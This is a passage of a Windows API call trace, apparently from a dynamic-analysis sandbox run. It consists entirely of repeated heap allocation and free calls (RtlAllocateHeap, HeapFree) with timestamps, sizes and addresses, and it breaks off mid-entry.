hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.410] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.415] RtlAllocateHeap (HeapHandle=0x6a0000, 